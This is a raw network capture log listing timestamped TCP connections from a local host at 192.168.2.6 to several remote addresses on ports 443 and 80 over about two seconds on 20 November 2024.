                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.931113005 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.931142092 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.931185961 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.931684971 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.931828976 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.932193041 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.932238102 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.932323933 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.932368040 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.932368040 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.932437897 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.935369968 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.935391903 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.935420036 CET49901443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.935430050 CET4434990113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938113928 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938133955 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938139915 CET49900443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938147068 CET4434990013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938950062 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938961029 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938971996 CET49903443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.938977003 CET4434990313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.951240063 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.951739073 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.951822042 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.952610016 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.953006983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.954607964 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.954626083 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.954776049 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.955426931 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.955431938 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.955465078 CET49902443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.955468893 CET4434990213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.961258888 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.961275101 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.961414099 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.995374918 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.995387077 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.996597052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.996597052 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.999358892 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.999389887 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.999459028 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.001548052 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.001588106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.001667023 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.001758099 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.010545969 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.010561943 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.010629892 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.010875940 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.010886908 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.011415958 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.011432886 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.014024973 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.014035940 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.014086962 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.014398098 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.014406919 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.545279026 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.619817019 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.644160032 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.644165993 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.644697905 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.644704103 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.644763947 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.645236015 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.645250082 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.645613909 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.645617962 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.669104099 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.680916071 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.681327105 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.693424940 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.693438053 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.694262981 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.694267035 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.704785109 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.704804897 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.705542088 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.705547094 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.706017017 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.706027985 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.706489086 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.706492901 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.748205900 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.748503923 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.748574018 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.749407053 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.749699116 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.749926090 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.793239117 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.793267965 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.793282032 CET49907443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.793287992 CET4434990713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.796263933 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.796286106 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.796298027 CET49911443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.796305895 CET4434991113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.808176994 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.808439016 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.808491945 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.808504105 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.808540106 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.809804916 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.810070992 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.810154915 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.819257021 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.819267988 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.819345951 CET49913443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.819351912 CET4434991313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.820782900 CET49912443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.820796967 CET4434991213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.836927891 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.836977005 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.837078094 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.839205027 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.839234114 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.839289904 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.843045950 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.844418049 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.844491005 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.938323975 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.938339949 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.938554049 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.945297003 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.945308924 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.946335077 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.946361065 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.946444035 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.946728945 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.946747065 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.948446989 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.948483944 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.949069023 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.949081898 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.953787088 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.953798056 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.953826904 CET49914443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.953831911 CET4434991413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.959345102 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.959373951 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.959465027 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.960824966 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.960845947 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.962321043 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.962343931 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.962460995 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.963007927 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.963018894 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.171128988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.171241045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.204798937 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.204837084 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.204921961 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.207081079 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.207103014 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.207345009 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.214883089 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.214911938 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.216600895 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.216619015 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.376069069 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.381011009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.422713995 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.423196077 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.423221111 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.424247026 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.424305916 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.424382925 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.424972057 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.424982071 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.425728083 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.425785065 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.425849915 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.425905943 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.425913095 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.426095963 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.426095963 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.426110029 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.426155090 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.426999092 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.427103043 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.427257061 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.427346945 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.427424908 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.427434921 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.428371906 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.428431988 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.428606033 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.428612947 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.533198118 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.533200979 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.542728901 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.542805910 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.543180943 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.543207884 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.543256044 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.543529987 CET49921443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.543540001 CET44349921172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.544118881 CET49919443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.544128895 CET44349919172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.558281898 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.558350086 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.558491945 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.558680058 CET49918443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.558689117 CET44349918162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.582123995 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.585920095 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.585935116 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.587268114 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.587272882 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.600850105 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.602514982 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.602550030 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.603018045 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.603024960 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.631855965 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.637794971 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.637845039 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.638145924 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.638184071 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.683917046 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.684041023 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.684231997 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.691812038 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.691821098 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.691831112 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.691836119 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.695696115 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.695720911 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.695885897 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.696410894 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.696424007 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701039076 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701231956 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701306105 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701370001 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701632023 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701649904 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701661110 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.701667070 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.705621958 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.705681086 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.705755949 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.706027985 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.706063986 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.755707979 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.756037951 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.756097078 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.756419897 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.756419897 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.756447077 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.756458044 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.760813951 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.760833979 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.760930061 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.761820078 CET49931443192.168.2.613.107.246.45
